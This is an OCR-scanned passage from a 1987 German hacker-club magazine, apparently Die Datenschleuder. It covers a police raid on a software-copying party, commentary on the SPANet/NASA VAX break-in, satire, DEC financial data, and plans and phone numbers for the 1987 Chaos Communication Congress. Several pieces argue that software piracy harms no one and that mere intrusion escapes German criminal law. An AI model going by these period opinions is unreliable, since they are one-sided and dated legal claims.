sich der Gast erst einmal bei der Anlaufadresse 
melden, und von don aus wurden die einzelnen 
Gäste zum Ot des Geschehens geschickt. 

Das eigentlich Erstaunliche spielte sich (wie wir erst 
'beim Frühstück danach’ erfuhren) kurz nach dem 
letzten Einlaßschluß draußen auf der Straße vor der 
Anlaufadresse ab. Ein junger Herr, der leider etwas 
zu spät kam und niemanden mehr antraf, spürte eine 
Hand auf der Schulter und wurde das erste Mai in 
seinem Leben 'vorläufig festgenommen’. Er wurde 
mit auf s Revier genommen und in seinen Taschen 
fand man neben einigen Disketten ('Alles Origi¬ 
nalsoftware’, grinste einer der Beamten) auch - na¬ 
türlich, denn ohne diese kein Einlaß - eine Einla¬ 
dungskarte. Wo er diese her habe. Nun und das stand 
ja groß und breit drauf: Art d’Ameublement. Die 
Leute mit der MODERNSTEN KUNST hatten zur 
’CrackerFetc’ geladen. 

Der junge Mann, der Montags beim Frühstück von 
seiner Festnahme berichtete, erzählte Unglaubli¬ 
ches: Videokameras lagen da rum und Spiegelre¬ 
flexkameras und mindestens sechs Kripo-Beamie 
wären daran beteiligt gewesen und hätten ihm er¬ 
zählt, daß 'eine Anzeige von außerhalb vorliegen 
würde’ und daß ihre Taktik gewesen wäre, reinzu¬ 
stürmen und erst mal alles zu vilmen und zu foto¬ 
grafieren. (Allerdings mußte der Türsteher immer 
erst mal den Schlüssel holen gehen...). Die Erzäh¬ 
lungen klangen seltsam. Wir erzählten die Ge¬ 
schichte gerne weiter, aberhaben sie eigentlich nicht 
so recht geglaubt. 

Seite 6 


Drei Tage später, Punkt 14 Uhr (da beginnen unsere 
galeristischcn Geschäftszeiten) standen drei Herren 
im Laden. Ja, richtig, die Kripo. Und da standen sie 
nun mit Haussuchungsbefehl für Laden, Privat¬ 
wohnung, Keller, Speicher und Auto. Ob wir mit der 
Hausdurchsuchung einverstanden seien, eine Frage, 
die man stets nur verneinen kann. Der Bitte um 
Aushändigung der Liste mit Namen und Adressen 
aller Gäste konnten wir nicht nachkommen, denn - 
selbst wenn sie existieren würde - könnte doch 
schließlich niemand von uns erwarten, daß wir sie 
bei uns aufbewahren würden. Dieser Argumentation 
konnten sich auch die Beamten nicht verschließen. 


Ganz heiße Leute 


Sie waren freundlich, und freundlich zeigten wir 
Ihnen den Computer (wir waren gerade dabei, Rech¬ 
nungen zu schreiben), dasDiskettcnlager, und schon 
nach 10 Minuten war unserAnwalt zur Stelle. Dann 
wurde grob oberflächlich die Geschäftskorrespon- 
denz durchgcwühlt und anschließend erzählte uns 
der Beamte noch, daß der 'Anzeiger' noch zum 
Besten gegeben hätte, daß wir 'ganz heiße Leute’ 
seien. Wir hätten auch den (ich kann das Wort nicht 
mehr hören) NASA-Hack mitgemacht. 

Wieso erzählt jemand so etwas? Und die Antwort 
war sämtlichen Paneien klar: Die 'Bullen' sollten 
'heiß gemacht werden, damit sie sich auf jeden Fall 
der Bit-Napping-Party annehmen. Auch die Polizi¬ 
sten fühlten sich von den Software-Firmen regel¬ 
recht mißbraucht. Nett wurde der Dialog, als Rena 
dem Leiter der Aktion einen Aufkleber vom FoBuD 
e.V. anbot und der Herr nur trocken antwortete, daß 
er gerade überlegen würde, ob er ALLE mitnehmen 
sollte. Er unterließ es. Alles, was beschlagnahmt 
wurde, waren etwa 60 Originale mit Seriennummem 
und etwa ebenso viele Raubkopien; Der Rest der 
Einladungskarten und übriggebliebene fotokopierte 
Stadlpläne. Für die Besucher von außerhalb, damit 
sic den Ort des Geschehens leichter finden. Natürlich 
ohne Kreuzchen an der betreffenden Stelle. 

Es ist anscheinend nicht die einzige Veranstaltung, 
die ’hochgenonunen’ werden sollte. Wir hatten 
Glück, daß wir uns aus den (uns selbst unsinnig 
erscheinenden) Sicherheitsvorkehrungen einen 
Sport gemacht haben. Ohne sie wäre die fröhliche 
Party sehr viel eher beendet gewesen, ein Zentral¬ 
computer (oder Karteikasten?!) mit einer Menge 
überflüssiger Pcrsonaldatcn gefüttert worden und 
einige Eltern wären vermutlich aus allen Wolken 
gefallen. 

Seite 7 


Aber einen Fehler sollten 'Veranstalter' und 'Gäste' 
von solchen Partys nicht machen: Kriminalroman 
spielen. Nur weil es unangenehm ist, wenn die Ex¬ 
ekutive in den Disketten herumschnüffelt, muß man 
sich nicht einigeln. Im Gegenteil. Je offener und 
aufrechter ein jeder zu seinen Handlungen steht, 
desto weniger lassen sich die Hacker und Cracker 
und Kids und/oder wie sie alle heißen, in die Kri¬ 
minalität drängen. FREE FLOW OF INFORMA¬ 
TION ist mehr als nur 'Hacker-Ethik'. 

Ich möchte hier an dieser Stelle nur wenig über 
'Profis' verlauten lassen. (Bezüglich der Diskussion 
Geld/nicht Geld für Raubsoftware). Der ’Profi- 
raubkopierer’ hat einen Job mit 60 Wochen- 
Arbeitsstunden, der sich in seiner Eintönigkeit kaum 
von einem Fabrikjob unterscheidet. Manche Men¬ 
schen brauchen halt neben dem neuesten Video und 
dem abgefahrensten Drink auch stets die neueste 
Version von MacMüHomatPlusTM. Ich sehe dies als 
ein Suchtproblem an. das sich aus dem Wesen des 
Mediums selbst ergibt. Diese Sucht ist nur über den 
- auch professionellen - Graumarkt zu befriedigen; 
bei einem Durchschnittseinkommen von ix-Mark- 
fuffzig Taschengeld. 

Geschadet wird tatsächlich niemandem, denn kaufen 
würde trotzdem niemand das Zeug. Die Verkaufs¬ 
zahlen der Ballerspielchen sind - so haben Befra¬ 
gungen des Fachhandels ergeben - immens hoch. 
Verhungern wird niemand in den Softwarefirmen. 
Höchstens die freien Programmierer, die sich die 
Programme für viel zu wenig Geld abkaufen lassen. 
Das Suchtproblem, das die Jagd nach der immer 
neuesten Software darstclit, sehe ich selber als re¬ 
lativ harmlos an. Es erledigt sich eines Tage.s von 
selbst. 

Ein jeder stellt fest, daß diese Welt keine aus¬ 
schließlich elektronische ist und daß es unmöglich 
ist, ein Programm in seine Freundin einzugeben und 
daß es vielleicht an der Zeit wäre, erst einmal spre¬ 
chen zu lernen. Die kopierten Spiele machen eh’ 
schon seit langem keinen Spaß mehr. Sie werden 
lediglich kopiert und weitergegeben. Für Telepathie 
gibi’s keine FTZ-Nummer, und Bier schmeckt in 
Gesellschaft immer am Besten. 

Weitermachen. 


Art d’Ameublement 
Rena Tangens & padeluun 

CLINCHIPOETRONIC/PADELUUNfZB.11.87/20:28/8522 

£afcn*if)Iaikcr 





AufgeDECt 

Editorial des DECKBLATT Nr. 11 ,1987 


“Das darf doch gar nicht wahr sein, mag sich 
manch einer gedacht haben, als bekannt w'urde, 
daH eine kleine Gruppe deutscher Hacker weit 
über 100Rechnerimwissenschaftlichen SPANet 
geknackt haben, darunter so “kapitale“ Systeme 
wie die der NASA oder des Kernforschungszen¬ 
trums CERN in Genf. Das darf doch nicht wahr 
sein, wird man vor allem bei DEC gedacht haben. 
Denn sämtliche geknackten Rechner waren VA- 
Xen unter VMS. Und gerade VAXyVMS hatte 
DEC doch immer als eines der sichersten Be¬ 
triebssysteme überhaupt bezeichnet. Eine Ein¬ 
schätzung, die übrigens auch das amerikanische 
Verteidigungsministerium teilte. 

Warder“Superhack“ ein Jux? Eine kri minel le Hand¬ 
lung? Oder war es gar eine ausgewachsene 
Spionage-Affäre, wie der britische Guardian arg¬ 
wöhnte? “Super-Stoff für Ost-Agenten“, so meldet 
auch “Bild“, sei den Hackern in die Finger geraten. 
John le Caire läßt grüßen. Spionage war das sicher 
nicht - dazu haben diese Hacker einfach nicht das 
Format. Ganz im Gegenteil, sagt auch der Chaos 
Computer Club. Sie wollten auf Sicherheitslücken 
aufmerksam machen. Soein schönes Motiv. Schade, 
daß sie es erst bekanntgegeben haben, nachdem sie 
sowieso entdeckt worden waren. 

Lassen wir uns doch nichts vormachen. Da haben 
junge Leute mit Computer und Modem gespielt - 
hier und da auch mal einen Rechner geknackt. Dann 
kam iiberdie elektronische Post ein neues Spielzeug. 
Kein Schaukelpferd, ein trojanisches. Solch neues 
Spielzeug will ausprobiert sein, und das SPANet bot 
sich als Spielwiese geradezu an. 

Es muß die DEC-Leutc hart getroffen haben. Nie 
werden sie müde, die Offenheit ihrer VAX- 
Architekiur zu betonen. Und nun kommt die Be¬ 
stätigung ausgerechnet aus der falschen Ecke. Aber 
DEC ist selber schuld. Nicht unbedingt wegen des 
Fehlers im Betriebssystem - das sollte zwar nicht 
passieren, aber welches große Software-Produkt ist 
schon vollkommen fehlerfrei? Vorwerfen muß man 
DEC vielmehr, daß der Hersteller auch nach Be¬ 
kanntwerden des Fehlers - und das ist immerhin 
schon einige Monate her - nicht sofort reagierte. 


SitticnSdikuba 


Schuld sind aber auch die System-Betreiber selbst. 
Hundenprozentige Sicherheit ab Werk ist eine Uto¬ 
pie. Es ist auch und vor allem Aufgabe der System- 



Manager, für die Sicherheit ihrer Rechner zu sorgen. 
Und diese Pflicht wird gerade in Forschungsein¬ 
richtungen oft aufs Gröbste vernachlässigt. Forscher 
wollen forschen, und daher ist es nicht selten, daß ein 
Student das System managt - so nebenbei. Es soll 
auch heute noch Rechner unter VMS 4.4 und 4.5 
geben, auf denen die DEC-Patches nicht tnstallien 
sind. Wenn ich einem Einbrecher meinen Haus¬ 
schlüssel gebe, darf ich mich nicht wundem, wenn 
anschließend etwa.s fehlt. 

Mittlerweile hat DEC den Fehler behoben. Die not¬ 
wendigen Patches sind ausgeliefert, eine neue VMS- 
Version steht ebenfalls seil einiger Zeit zur Verfü¬ 
gung. VMS ist wieder eines der sichersten Be¬ 
triebssysteme der Welt. Das war es tatsächlich auch 
vorher schon, die Einschätzungen von DEC und dem 
Dod (Department of Defense) waren so falsch nicht. 
Es gibt kein Betriebssystem, in das Hacker nicht 
eindringen könnten, wenn .sie es nur wirklich wollen. 
Daß es gerade DEC getroffen hat, hat eigentlich nur 
einen Grund; Die anderen Betriebssysteme waren 
den Hackern nicht interessant genug. Außerdem - wo 
findet man sonst noch so ausgedehnte Netze? Inso¬ 
fern war der Superhack ein Kompliment für DEC. 

Hat er DEC denn nun eigentlich geschadet? Ein 
wenig am Image hat er schon gekratzt - das ist halt 
so eine dumme Eigenart negativer Schlagzeilen. 
Aber schauen wir uns doch einmal einen der sensi¬ 
belsten Sensoren an - Wall Street. Der Aktienkurs 
von DEC hat nicht den geringsten Rückschlag hin¬ 
nehmen müssen. Im Gegenteil.“ 


Thomas Hertel (stellvertretender Chefredakteur) 

Seite 8 


CCC und NASA 

Viel Rauch um nichts 


(SZ) - Neulich saßen sie wieder zusammen, die 
Jungs vom Chaos-Computer-Club in Hamburg, 
spezialisiert auf Einbrüche in Elektronenhirne 
aller Art,und hackten und zapflen/drahteten und 
kabelten/schalteten und walteten. 

Einer las gähnend Volkszählungsdaten eines Stati¬ 
stischen Landesamtes, der zweite schmuggelte mit¬ 
tels eines Ostberliner Redaktionssystems das Won 
Glasnosi in den Aufmacherdes Neuen Deutschland 
vom nächsten Tag, der dritte versuchte die Ketchup- 
Formel eines internationalen Hamburger-Konzems 
zu finden. Da rief der vierte: “Mööönsch, ich bin bei 
der NASA!“ Die anderen sprangen herbei, und rich¬ 
tig, da stand auf dem Bildschirm; “Guten Tag, hier 
ist die amerikanische Raumfahnbehörde.“ Zwar 
handelte es sich bloß, wie sich herausstellte, um den 
elektronischen Abfallkorb der NASA, in den man 
vorgedrungen war, aber man wei ja, da es die Ab¬ 
fallprodukte der Weltraumforschung in sich haben. 
“1) Teflonpfanne“ stand da, “2) Schwerkraftunab¬ 
hängiger Kugel Schreiber“. Dann kam es: “3) Rauch¬ 
freie Zigarette“. 

Dem folgenden Text war zu entnehmen, daß sich in 
den Siebziger Jahren eine Forschungsgruppe mit der 
Frage beschäftigt hatte, wie man Astronauten auch 
whrend eines Welüaumfluges das Rauchen ermög¬ 
lichen könnte. Die Zigarette dürfte, so hieß es, er¬ 
stens keine Asche hinlerlasscn, weil in der Kapsel 
kein Platz für Aschenbecher sei, und sie dürfte zwei¬ 
tens keinen Rauch entwickeln, denn der Blick auf die 
Sterne müsse frei bleiben. Ein geheimer For¬ 
schungsauftrag wurde an die amerikanische Ziga¬ 
rettenfirma R.J. Reynolds vergeben, deren Techni¬ 
kern das unmöglich Erscheinende gelang: Tabak 
ersetzten sie durch Tabakextrakt, Geschmacksstof¬ 
fe, Glyzerin und ähnliche Leckereien, ein Kohle¬ 
stück an derSpitze sorgtefür glühend heiße Luft zum 
Einatmen. Leider verschwand die Erfindung dann 
im NASA-Computer, weil der amerikanische Ge¬ 
heimdienst herausgekriegi hatte, da die Russen 
Nichtraucher als Astronauten einsetzten, um sich 
einen Vorsprung im All zu verschaffen. 

Nun ist die Sache doch an die Öffentlichkeit ge¬ 
kommen. ALs die NASA entdeckte, daß Hamburger 
Chaoten bei ihr eingedrungen waren, informierte sie 
sofort den Vorstandsvorsitzenden von R.J. Rey- 

Seite 9 


Wirtschaftsdaten 


Digital Equipment Corporation 


Digital Equipment GmbH 
Freischützstrasse 91 
8000 München 81 
Tel.: 089/9591-0 
Telex 5 215 780 
Btx 20898 

Telefax 089/9591-1010 


DEC in Zahlen (Alle Angaben in Mio DM) 



1983 

1984 

1985 

1986 

Teilkonzemumsau 

461 

616 

913 

1092 

Veründenjng in % 

-t-6 

+34 

+47 

+20 

Beschäfiigie 

1490 

1886 

2456 

305S 

BilanMumme 

233 

367 

485 

533 

Grundkapital 

8, 

20 

40 

85 

Rücklagen 

12 

- 

6 

6 

Sachanlagen 

32 

38 

62 

115 

Beteiligungen 

- 



■ 

Liquide Mittel 

10 

8 

17 

19 

Personalaufwand 

101 

117 

156 

211 

Investitionen 

17 

25 

53 

91 

Jahrcsühcrschuß 

1.8 

4.7 

7,5 

10,3 


nolds, der unverzüglich eine Pressekonferenz ein¬ 
berief und bekanntgab, seine Firma wolle mit einer 

rauchlosen Zigarette den von militanten Nichtrau¬ 
chern bedrängten US-Markt erobern. Die NASA 
erwähnte er nicht. Das war am Montag, gerade ein 
Tag, bevor die Hacker aus Flamburg mit ihrer Pres¬ 
sekonferenz so weit waren. Wer sollte ihnen die 
Wahrheit noch glauben? Sie berichteten also bloß 
allgemein von einer geknackten NASA-Datenbank 
Namens Space Physics Analysis Network und er¬ 
wähnten den Abfallkorb nicht. Aber Lesern, welche 
die Zusammenhänge hinter den Nachrichten des 
Tages suchen, verraten wir mehr: Es ist kein Zufall, 
daß - ebenfalls am Montag dieser Woche - das 
Batelle-Instilut (Frankfurt) etwas hektisch die Er¬ 
findung einer schmelzfesten Schokolade für Kinder 
bekanntgab. 


Quelle; Süddeutsche Zeitung, 17.9.87 

SättcnNiicukcr 








Die internationale Hackerparty 

Chaos Communication Congress 1987 


Zum viertem Mal veranstaltet der CCC in Ham¬ 
burg seinen Communication Congress. Wie 
schon in den vergangenen Jahren treffen sich 
zwischen den Feiertagen Daten reisende, Tele¬ 
fonfreaks, Informationspfadfinder, Funkma- 
niacs, Netzflaneure, Bitniks, Hacker und Hack¬ 
sen zur Internationalen Hackerpariy. Entgegen 
anderslautenden Veröffentlichungen startet der 
Congress am Sonntag dem 27. Dezember um 10 
Uhr und endet am Montag dem 2S. Dezember 
gegen 21'Uhr. Veranstaltungsort ist, wie in den 
vergangenen Jahren, das Eidelstedter Bürger¬ 
haus, Elbgaustraße 12, in Hamburg Eidelstedt. 


“Offene Netze - Jetzt!“ 


Der Congress steht dieses Jahr unter dem Motto; 
“Offene Netze - Jetzt“. Weiterhin geht es um “Hac¬ 
ker und Staat“ (Hintergründe der Nasa-Story, Pa¬ 
nikmanagement beim CCC, Bundespolizei undHac- 
ker, sowie einer Diskussion über Perspektiven der 
Hacker-Szene). Juristische Workshops erläutern die 
“Tarife fürs Hacken“. Weiterhin Infos über Ver¬ 
schlüsselung und Verschleierang. Vorgestellt wird 
auch ein neues Konzept zur Vernetzung von Mail¬ 
boxsystemen (BtxNet). Der genaue Congressfaht- 
plan wird erst Mitte Dezember vorliegen und dann 
sogleich über die Netze verbreitet. Spannung und 
Aktion werden jedoch garantiert. 

Wegen der sehr schlechten Terminlage - kurz nach 
Weihnachten - beginnt der Aufbau am Congress-Ort 
schon am Donnerstag dem 24. Dezember. Am Vor¬ 
mittags des Heiligen Abend wird die 
Telekommunikations-Infrastruktur (internes 

Telefon- und Datennetz) verlegt. Ami. und 2. Weih¬ 
nachtsfeiertag wird der Congress eingerichtet. Hel¬ 
fer und Referenten können ab dem 24. Dezember am 
Tagungsort eintreffen. Auswänige Gäste werden ab 
Samstag (2. Weihnachtsfeiertag) eingelassen und 
erhalten abends ihre Schlafplätze zugewiesen. Über¬ 
nachtungsmöglichkeiten werden von Samstag bis 
Montag bereitgehalten. 

Der elgendlcli« Lubyrtnlhnjrstagmiif 

> 0 

©BlcnS^lculJcr 



Wie in den vergangenen Jahren bietet die 
DATENSCHLEUDER-Redaktion angehenden Re¬ 
dakteuren Zugriff auf das Redaktionsarchiv und un¬ 
seren Schnellkopierer. Neu ist eine eigenständige 
Congressredaktion, in der aktuelle Meldungen für 
die öffentlichen und internen Netze erstellt werden. 
In diesem Jahr wird der CCC erstmals mehrfach 
täglich auch mit einem eigenen Fernsehsender (A- 
mateurfunkfemsehen) vom Congress berichten. Aus 
der Congress-Mailbox können Daheimgebliebene 
die aktuellen Meldungen vom Congress abfragen 
(Eventuell können die Meldungen auch Uber Btx 
abgerufen werden). 

Im Hack-Center stehen mehrere Telefonleitungen 
bereit, um einen freien Zugang zu den internatio¬ 
nalen Datennetzen zu ermöglichen. Für Frühstück 
und Kaffee bietet das Chaos- Cafe wieder seine Dien¬ 
ste an. Desweiteren finden Referate, Diskussionen 
und Demonstrationen in den Workshops im Theater 
und den Konferenzräumen statt. 


Der Congress wanzt 


Wegen der technischen Demonstrationen gelten die 
Räumlichkeiten als “Elektrisches Labor“, zu dem 
nur Unterwiesene Zutritt haben. Jeder Teilnehmer 
hat sich bei örtlichen Funkamateuren / Elektronikern 
etc. vorher fachkundig zu machen. Das Fotografie¬ 
ren sowie das Aufzeichnen mittels Ton- und Bild¬ 


trägem ist, wie in den vergangenen Jahren, aus Da¬ 
tenschutzgründen untersagt. Ira Rahmen der Pres¬ 
searbeit werden TV-Teams anwesend sein. Nicht 
ausgeschlossen werden kann, daß staatliche Dienst¬ 
stellen den Congress als Datenregister verwenden 
möchten. AusdiesemGrund sollte JederTeilnehmer 
dementsprechend vorsichtig sein. Die Projektlei¬ 
tung wird täglich eine Überprüfung auf Verwanzung 
vornehmen und ein Frühwarnsystem für größere 
Polizeiaktionen vorbereiten. Für alle Fälle werden 
mehrere Anwälte der Veranstaltung beiwohnen. 

Alle Teilnehmer benötigen dieses Jahr ein Paßfoto 
für den Congress-Ausweis. Die Congress-Ausweise 
haben sich bei der letztjährigen Bombendrohung 
und der anschließenden Räumung als äußerst nütz¬ 
lich erwiesen. Mindeijährige erhalten gekenn¬ 
zeichnete Congress-Ausweise und müssen die Räu¬ 
me bis 22 Uhr verlassen (Jugendschutzgesetz). 

Die Teilnahmegebühr beträgt für Mitglieder 
(CCCcV) und Mindeijährige DM 15,-, für Presse¬ 
vertreter DM 50,- und für alle anderen DM 20,-. Die 
Beträge können zukünftig nur so günstig gestaltet 
werden, wenn nicht wie im letzten Jahr Telefone und 
Modems im Wert von über DM 2000,- verschwin¬ 
den! 

Wir rechnen dieses Jahr mit 400 bis 600 Teilneh¬ 
merinnen. Eine rechtzeitige Voranmeldung sichert 
auch bei Überfüllung noch den Einlaß. Voranmel¬ 
dung durch Einzahlung auf Posigiro (BLZ200 100 
20) Konto 599090-201 für den CCCeV. Bitte den 
Beleg mitbringen! 

Schlafplätze sollte man sich privat besorgen. Wer es 
sich leisten kann, dem sei ein preiswertes Zimmer 
auf der Reeperbahn (da gibts nachts noch was zu 
beißen) empfohlen. Für Ausnahmefälle hat der CCC 
mehrere Nachtlager (Schlafsack) von Samstag bis 
Montag in petto. 

Ab Heiligabend ist die Congress-Mailbox unter der 
Rufummer 040-5704065 (38nld) erreichbar. Die 
Congressredaktion beantwonet Fragen zum inhalt¬ 
lichen Geschehen unter der Rufnummer 040- 
5705696. Die Projektleitung und Vermittlung ist 
unter 040-5705708 erreichbar. 

Weitere Informationen können im Vorfeld über die 
CLINCH-Mailbox 040-6323517 (38nlD) abgeru¬ 
fen werden. Die CCC Geschäftstelle ist unter 040- 
4903757 erreichbar. Für Referenten und Organisa¬ 
tionsfragen ist die Btx-Redaktion unter 040-483752 
(VOICEÜ!) erreichbar. 


Hier nochmal die wichtigsten Telefondaten: 

Vorbereitung: 

CCC-Geschäftsstelle: 040-490 37 57 
Btx-Redaktion (Congressorganisation): 040-48 
37 52 

CLINCH-Mailbox (38nlD); 040-632 35 17 
Durchführung: 

Congressmailbox (38nlD): 040-570 40 65 
Congressredaktion (Pressestelle): 040-570 56 96 
Projektleilung und Vermittlung: 040-570 57 08 

Der Chaos Computer Club hofft auf rege Teilnahme, 
so daß wie in den vergangenen Jahren Communi¬ 
cation und Information im Vordergrund der Ver¬ 
anstaltung stehen. 

S.Wernery 291914 Nov 87 BEREICH RED CON¬ 
GRESS CCC87 



mmr ofa mmR 


PAR.T TVO s SUkVlVAL 

Sxi(ciiSii;Icuktr 


Seite 10 


Seite 11 





Congressredaktion 

Die CCC Pressestelle am Congress 


Hamburg (CCC87) - Die Congress-Redaktion 
hat für dieses Jahr eine umfangreiche Berich¬ 
terstattung vorbereitet. Vom 26. bis einschlie߬ 
lich 28. Dezember werden wir aktuelle Meldun¬ 
gen, Hintergrundberichte, Features, Dokumen¬ 
tationen, den Pressespiegel und bei Bedarf In¬ 
terviews anbielen. Dieser neue Congress-Scrvice 
dient in erster Linie zur internen Kommunika¬ 
tion, wird darüber hinaus aber auch für Presse, 
Funk und Fernsehen produziert. Zudem soll ge¬ 
testet werden, inwieweit es gelingt, für die Dauer 
des Congresses eine eigene Medien-Infrastruktur 
aufzubauen und zu beliefern. Mit größeren Ka¬ 
tastrophen ist zu rechnen. Zur Verbreitung ste¬ 
hen folgende Medien zur Verfügung: 

- Congiess-Zeitung 

- aktueller Tagesdien.st (?) 

- ggf. Bildschirmtext 
• Congess-Mailbox 

- Mailboxdrucker (Hardcopies für Pinwand) 

- Amateurfunkfernsehen 

Cungress-Zeitung 

Die Congress-Zeitung ist auch in diesem Jahr eine 
Sonderausgabe der DATENSCHLEUDER. Wir 
werden uns bemühen, die Congress-Zeitung wäh¬ 
rend der laufenden Veranstaltung zu produzieren. 
Die Congress-Zeitung wird die interessantesten 
Meldungen aus dem allgemeinen Nachrichtenan¬ 
gebot enthalten. 

aktueller Tagesdienst 

Sofern notwendig und technisch zu realisieren, wer¬ 
den zwei mal täglich Kurzmeldungen mit einer Zu¬ 
sammenfassung der wichtigsten Ereignisse als DIN- 
A-4 Fotokopie unter den Congress-Teilnehmern 
verteilt. Beabsichtigt sind bis zu acht Kurzmeldun¬ 
gen a neun Zeilen. Darüber hinaus sollen bei Bedarf 
auch die CCC87-Pressemitteilungcn verteilt wer¬ 
den. 

ggf. Bildschirmtext 

Eine Auswahl des aktuellen Tagesdienstes, aufbe- 
reilet mit zusätzlichen Informationen werden ggf. im 
Bildschirmtext angeboten. Der Btx-Dienst wird zu¬ 
sätzlich auf der Congress-Mailbox im Breil Chaos 
unter der Betreffkennung CCC87A>tx eingespielt. 


Congress-Mailbox 

Die Congress-Mailbox ist unter der Rufnummer 

040/-5 je iC^Szu erreichen. Sie ist zum einen die 
Schnittstelle nach außen und gleichzeitig das elek¬ 
tronische Infomiationsmedium des Congresses. Es 
ist ein stündliche ablaufendes Intermail zwischen 
FIDO-Net, Congress-Mailbox und anderen Netzen 
vorgesehen. Mit diesem Service soll versucht wer¬ 
den, von außen kommende Informationen direkt in 
laufende Veranstaltungen einzubringen. Box- 
Beireiber im FfDO-Net sollten sich überlegen, ob Sie 
für die Zeit des Congresses ein Brett CCC87 ein¬ 
richten wollen. Aus Kapazitalsgründen ist eine 
Übersetzung ins Englische nicht möglich. Wer in¬ 
teressante Informationen übersetzen und auf die In¬ 
ternationale Ebene hieven will, sei dazu herzlich 
aufgefordert. Sämtliche Meldungen haben Net¬ 
zwerkfreigabe. 

Mailbox-Drucker (Hardcopies für Pinnwand) 
Sämtliche von der Congress-Redaktion produzierte 
Meldungen, sowie alle Informationen die über FIDO 
und andere Netze ankommen, werden als Hardcopy 
an eine Pinnwand vor der Congress-Redaktion aus¬ 
gehängt. Damit hat jeder Congress-Teilnehmer die 
Möglichkeit, sich einen Überblick zum gesamten 
Nachrichtenaufkommen zu verschaffen, 

Amateurfunkfernsehen 

Vorgesehen ist eine Direktübertragung laufender 
Veranstaltungen. Sofern keine Veranstaltungen lau¬ 
fen, ist daran gedacht, vorproduzierte Videobänder 
cinzuspiclen. Zudem sind kurze Nachrichienblocks 
geplant, die von einem Sprecher verlesen werden. 
Die Nachrichten liefert die Congress-Redaktion. 
Daür der Nachrichtenblöcke max. fünf Minuten, In 
den Sendepausen wird die Congress-Mailbox auf 
den Sender geschaltet. 

Die Congress-Redaktion (Pressestelle) hat einen ei¬ 
genen Telefonanschluß. Unter der Rufnummer 
040/570 56 96 werden Presseanfragen beant¬ 
wortet. Zudem übernimmt die Redaktion in diesem 
Jahr die Organisation für Interviews. 


Das Metdungsangebot im Einzelnen: 


Wir beginnen am 26. Dezember mit einer Aufiakt- 
meldung (60 Zeilen) und einigen vorbereiteten, zeit¬ 
losen Features bzw. Hintergrundberichlen. Vorge¬ 
sehen ist ein Hintergrund zum Amateurfunkfemse¬ 
hen, sowie Einführungsbeiträge zu wichtigen Yer- 



S>aleiifif/Itu>cr 


Seite 12 


ansialtungsihemen. Diese Meldungen werden in die 
Congress-Mailbox eingespielt und haben in der Be¬ 
treffzeile die Kennung CCC87: 

In diesem Jahr werden alle Referenten gebeten, von 
ihrem Vorbereitungsmaterial eine Kurzfassung zu 
schreiben, bzw. ihre Texte der Congress-Redaktion 
zur Verfügung zu stellen. Während der laufenden 
Veranstaltungen werden diese Inhaltsangaben in die 
Congress-Mailbox eingespielt. 


+ ACHTUNG: Presserechtlich gilt das gespro- 
.chene Wort -i- 

Sofern wir personell dazu in der Lage sind, werden 
Mitglieder der Congress-Redaktion gezielt an den 
Veranstaltungen teilnehmen und das Wesentliche 
protokollieren. Diese Informationen werden als Zu¬ 
sammenfassung des Diskussion.sverlaufs ebenfalls 
in die Congress- Mailbox eingespielt. Im Rückkanal 
werden wir Anfragen, Beiträge und inhaltliche An¬ 
merkungen, die uns über die Congress-Mailbox zu¬ 
geschickt wurden, stellvertretend in die laufenden 
Veranstaltungen einbringen. 

Zwischendurch wird die Box mit bunten Meldungen 
vom Rande des Congresses beliefert. Wichtige Er¬ 
eignisse werdn als Kurzmeldungen verbraten. Je 
nach Bedarf, werden wir kurze Hintergrund- 
Infoimationen aus dem umfangreichen CCC-Archiv 
einspielen. 


Personelle Besetzung 

Für die Congress-Redaktion werden noch vier Fä¬ 
hige Mitarbeiter gesucht. Voraussetzungen zur Mit¬ 
arbeit sind. 

- Starke Nerven und die Fähigkeit, auch im Unter¬ 
gang den Überblick zu halten. 

- Eigenständiges Arbeiten im Team mit der Fähig¬ 
keit, zwischen Informationsgeröll und Wesentli¬ 
chem unterscheiden zu können, 

- Meldungen schnell schreiben zu können. 

- Eine ordentliche Portion Humor und Kreativität. 

- sowie die Fähigkeit, Wunder zu vollbringen. 

jwl 011256 Dez 87 BEREICH KONGRESS CRED1 


Merkwürdig 


Eines schönen Tages klingelt unser nettes, weisses 
Telefon. Ein Herr meldet sich plump vertraulich und 
wollte einen ’Einführungskurs' ins Hacken haben. 
Er bot Geld. Wir hatten gerade keine Zeit und baten 
zur Terminvereinbarung um seine Telefonnummer. 
Er ziehe gerade um und würde sich wieder melden, 
sagte der Unbekannte. Wir haben nie wieder etwas 
von ihm gehört. 


padeluun 


CLINCH/CHAOS/PADELUUN/25.11.87123:15/404 Z. 



Stoepsel veröffentlichte in der letzten DATEN- 
SCHLEUDEK zwei Artikel zu Hackern und Ge¬ 
setzen (“Die neuen Tarife fürs Hacken“). Hier 
nun eine Gegenmeinung in Kurzform. 

Zu §202a: Es ist entscheidend, was man unter "ver¬ 
schaffen von Daten“ versteht. Christoph Biihler de¬ 
finiert es wie folgend: “Gmndsätzlich versteht man 
hierunter die Übernahme der tatsächlichen Verfü¬ 
gungsgewalt und des winschaftlichen Wertes zu 
eigenen Zwecken (bzw. bei Var. 2 die Übernahme 
für einen Dritten und des wirtschaftlichen Wertes zu 
eigenen Zwecken des Dritten.“ weiter führt er aus: 
“Daher sind beispielsweise auch die sog. “Hacker“, 
die sich mit einem bloßem Kenntnisverschaffen be¬ 
gnügen, straffrei nach §202a Stgb.“ (Zitiert nach: 
Christoph Buhler, “Ein Versuch, Computerkrimi¬ 
nellen das Handwerk zu legen“. Das Zweite Gesetz 
zur Bekämpfung der Wirtschaftskriminalität, MDR 
6/1987) 

Zu §303b: “Gestört“ ist das entscheidende Won. 
Wann ist eine DV-Anlage gestört? Die NASA- 
Rechner sind wegen der Trojanischen Pferde nicht 
gestört, nicht einmal in ihrer Funktion beeinträch¬ 
tigt, eher um Funktionen erweitert. 

asterix 


Seite 13 


S>nlcn3>I|Icubcc 




Begriffsvernebelung 

Zum Thema Raubkopieren 



In der letzten DATENSCIILEUDER fand sich 
ein Artikel zum Thema “Raubkopieren“. Als 
Verfasser zeichneten Caesar/Stöpsel. Was das 
“/Stöpsel“ angeht, hat mich die Redaktion durch 
ein Versehen mit Federn geschmückt, die mir 
mangels Urheberschaft nicht zustehen. Ich muß 
mich aber, vor allem in Bezug auf die Gesamt¬ 
tendenz, von dem Artikel distanzieren, möchte 
das aber jetzt nicht im einzelnen erörtern. Da¬ 
gegen will ich die Aufmerksamkeit lieber auf 
einen bisher völlig vernachlässigten Aspekt der 
Raubkopierer-Diskussion lenken: Den Begriff 
